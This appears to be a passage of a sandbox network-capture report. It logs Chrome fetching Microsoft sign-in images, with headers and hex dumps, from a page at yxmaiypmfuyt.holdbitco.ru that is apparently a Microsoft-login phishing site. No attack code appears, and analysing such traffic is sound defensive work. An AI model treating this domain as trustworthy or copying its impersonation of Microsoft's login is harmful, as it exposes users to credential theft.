                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1614INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69 6c 6c 3d 22 23
                                                                                                                                                                                                                                                                                                              Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              132192.168.2.1649848152.199.4.44443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1605OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: aadcdn.msftauth.net
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1618INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                                                                                              Age: 12693052
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Content-MD5: nTculR1Fom7eLci0F6rk+A==
                                                                                                                                                                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:17 GMT
                                                                                                                                                                                                                                                                                                              Etag: 0x8DB5C3F4ADC079A
                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:51 GMT
                                                                                                                                                                                                                                                                                                              Server: ECAcc (dcb/7F50)
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                              x-ms-request-id: ea0142d8-d01e-008a-7fef-930c82000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                              Content-Length: 7390
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1619INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31 30 2e 33 33 35 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              133192.168.2.1649847152.199.4.44443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1606OUTGET /shared/1.0/content/images/picker_verify_call_c2616792e1950f83fdef6e72dab97293.svg HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: aadcdn.msftauth.net
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1614INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                                                                                              Age: 13175539
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Content-MD5: XHrPYKKsqlxUvysuxtSE2A==
                                                                                                                                                                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:17 GMT
                                                                                                                                                                                                                                                                                                              Etag: 0x8DB5C3F4A98E9BB
                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:50 GMT
                                                                                                                                                                                                                                                                                                              Server: ECAcc (dcb/7351)
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 67c07018-f01e-009e-268b-8f5806000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                              Content-Length: 2905
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1615INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35 34 71 2e 34 38
                                                                                                                                                                                                                                                                                                              Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.48


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              134192.168.2.164985013.107.253.40443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1606OUTGET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1610INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Content-Length: 673
                                                                                                                                                                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                              Content-MD5: DhdidjYrlCeaRJJRG/y9mA==
                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:46 GMT
                                                                                                                                                                                                                                                                                                              ETag: 0x8DB5C3F47E260FD
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 717db9e1-901e-0086-3346-079a2a000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Azure-Ref-OriginShield: 0LzI5ZQAAAAAQDNU4TZ8VSY/5gOxlK0KvTU5aMjIxMDYwNjExMDI5ADM5YTEyZjdlLTg5OWYtNDZjZi1hNmQwLTI0YmJiYTI3ZDk1Ng==
                                                                                                                                                                                                                                                                                                              X-Azure-Ref: 0XUI5ZQAAAAB0T3WEdpOPR5k27E+jC5+XTU5aMjIxMDYwNjE0MDE3ADM5YTEyZjdlLTg5OWYtNDZjZi1hNmQwLTI0YmJiYTI3ZDk1Ng==
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:17 GMT
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1611INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                                                                                                                                                                                                                                                                                              Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              135192.168.2.164984913.107.226.40443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1607OUTGET /shared/1.0/content/images/picker_verify_email_958962caa7cf6b75cd412e9e3b687b22.svg HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: logincdn.msauth.net
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                              Referer: https://yxmaiypmfuyt.holdbitco.ru/
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1612INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Content-Length: 212
                                                                                                                                                                                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                              Content-MD5: pFQUXilUkzYtIbvSwGgVBQ==
                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 24 May 2023 10:22:52 GMT
                                                                                                                                                                                                                                                                                                              ETag: 0x8DB5C40D4C9EED2
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 6c8a184b-b01e-0000-1f58-073773000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Azure-Ref: 0XUI5ZQAAAAAD1a9Yol+iSpKcYddZ+eKLTU5aMjIxMDYwNjEyMDI3AGRiNjYyZmUzLWY0MzgtNDNjMi1hMjlmLWU2NTkwYzRmNWU1MQ==
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:17 GMT
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1613INData Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f 31 6f 03 21 0c 85 ff 0a a2 2b 05 03 ce 85 54 70 43 a7 1b 9a 35 43 b7 a8 a1 07 d2 e5 2e 0a 56 c8 cf 2f d7 53 c7 ca 1e fc fc ac ef c9 be 3c 46 f6 bc 4e 73 09 3c 11 dd de 94 aa b5 ca 6a e5 72 1f 95 01 00 d5 2e 38 ab f9 42 29 70 74 9c a5 98 c7 44 db fc c8 b1 be 2f cf c0 81 01 43 d7 9a f7 9e 32 4d b1 3f 97 12 a9 78 b5 29 7f 8f 5f f4 1f e5 3b 4f 53 e0 f3 32 47 ae 7a 7f 3b 53 62 97 c0 8f 1a 84 35 83 75 27 ed a4 36 bb 0f 83 c2 ec a4 86 83 68 ce b6 3b 59 73 95 c6 e2 ab ee 7e 6d 23 dd 41 0b bb 97 fb ae 13 ba 1b 34 ac ee 11 1b 09 87 06 c2 01 e1 f3 2f f0 05 61 ad 35 73 7d b2 ff 01 49 f1 76 43 0c 01 00 00
                                                                                                                                                                                                                                                                                                              Data Ascii: u1o!+TpC5C.V/S<FNs<jr.8B)ptD/C2M?x)_;OS2Gz;Sb5u'6h;Ys~m#A4/a5s}IvC


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              136104.21.0.95443192.168.2.1649843C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1608INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:17 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                                                                              Content-Length: 727
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Sun, 19 Mar 2023 15:20:17 GMT
                                                                                                                                                                                                                                                                                                              ETag: "2d7-5f7425905ae40"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Age: 10880
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mrOAsNRQA6Cts9wmfrjnwtV7qbRhbj1eVGlc4kQDkcVSc7%2F7BzcU0RFM85XZG2gayihlKZsWGgPkVCQHE8DFcMYC2uB5WRvZj4X7YL%2B1urln%2Bqhm5kGHCZUa35idDViwxbRa4YqGWtja97Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd667cea281d5-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1608INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 02 9e 49 44 41 54 68 43 ed 97 81 51 1c 31 0c 45 8f 0e a0 83 a3 03 e8 60 a9 00 a8 20 a4 02 a0 82 90 0a a0 03 ae 83 90 0a b2 54 00 1d e4 3a 80 0e c8 7f 37 72 c6 ec dc ad e5 b5 73 77 3b 59 cf 68 18 f6 64 4b 5f 5f 92 e5 83 d9 c8 d7 c1 c8 fd 9f 4d 00 76 cd e0 c4 c0 c4 40 61 04 fe df 14 6a 9a e6 50 c1 3b 91 9c 4b 1a 09 ff b3 5e 25 ef 92 e7 b6 6d 17 85 01 4e 6e 1f c4 80 9c bf d1 c9 d7 92 79 d2 c2 6c f6 5d 40 ee 1c 7a 83 54 b2 00 58 d4 1f 65 e9 c2 ac b5 44 5a f2 24 59 1a 0b b0 12 98 e1 6f 60 e5 4c 40 60 a6 ea 72 03 30 e7 7f 99 73 38 42 64 1f fa bc 31 a6 ee 4d 87 3d c7 b5 41 e4 00 f8 61 91 27 c7 2f e5 08 11 4f 2e 81 80 05 40 34 12 6d 6b cf 92 9b 32 14 5c 00 a2
                                                                                                                                                                                                                                                                                                              Data Ascii: PNGIHDR00WIDAThCQ1E` T:7rsw;YhdK__Mv@ajP;K^%mNnyl]@zTXeDZ$Yo`L@`r0s8Bd1M=Aa'/O.@4mk2\
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1609INData Raw: 5e 3c e0 79 01 dc c9 d8 37 09 11 23 72 83 bb 51 6d 10 2e 00 44 5a 86 c3 7d 90 35 cc ad 63 a9 26 88 1c 00 b4 d2 30 13 e1 57 72 1c b0 cb 8e bc 9f 77 db 66 2d 10 6e 00 c6 02 20 18 2d 1a 8b 2c 6c fc 94 30 cb b5 d1 33 93 b6 fb 45 12 1e 34 6b fb 7e 0d 10 59 00 42 3a 74 1e 2a 7d b5 4c cd 00 7a e3 c5 55 0a 62 10 80 0e 10 1e f5 73 13 1c a6 c0 11 9e 9a 0b c9 ea 1d d0 77 f3 96 80 28 02 d0 17 fa 08 e4 6a 74 e8 ae 5a 35 b1 37 00 00 38 84 89 7f 0e a0 1b f9 d4 30 d7 05 11 3f a2 d6 31 b9 77 00 22 26 92 b5 83 ee ce 00 38 6a c2 35 76 4f 00 3c 9d a8 4f 67 53 4d a4 6a 25 9c b9 75 06 bc 45 3d 3a 00 9b 58 4a 3d 3d f7 86 81 d1 02 28 ad a1 9d 33 30 01 28 8d c0 ae f7 4f 29 34 31 50 18 81 d1 a7 d0 1f 70 6b 51 40 66 f8 53 a2 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                                                                                              Data Ascii: ^<y7#rQm.DZ}5c&0Wrwf-n -,l03E4k~YB:t*}LzUbsw(jtZ5780?1w"&8j5vO<OgSMj%uE=:XJ==(30(O)41PpkQ@fSIENDB`


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              137104.21.0.95443192.168.2.1649844C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:29:17 UTC1609INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:29:17 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                                                                                              Content-Length: 231
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Sun, 19 Mar 2023 15:20:17 GMT
                                                                                                                                                                                                                                                                                                              ETag: "e7-5f7425905ae40"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Age: 10880
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W2ZbwrPC7SoAuRC9e%2Fd5SGI8uv4EZY4n83nFXvfZu2SJ4yy475%2F8Qn5Zp2K0ZucSI1yXfLINNxkZbVN9urBW2DDNFYynUV2FI2ao618gw3GEB%2F%2BoQI1ws%2FrzgfgiNnohaLKK%2FHPp%2B9OVcgM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd667ca3a822d-IAD
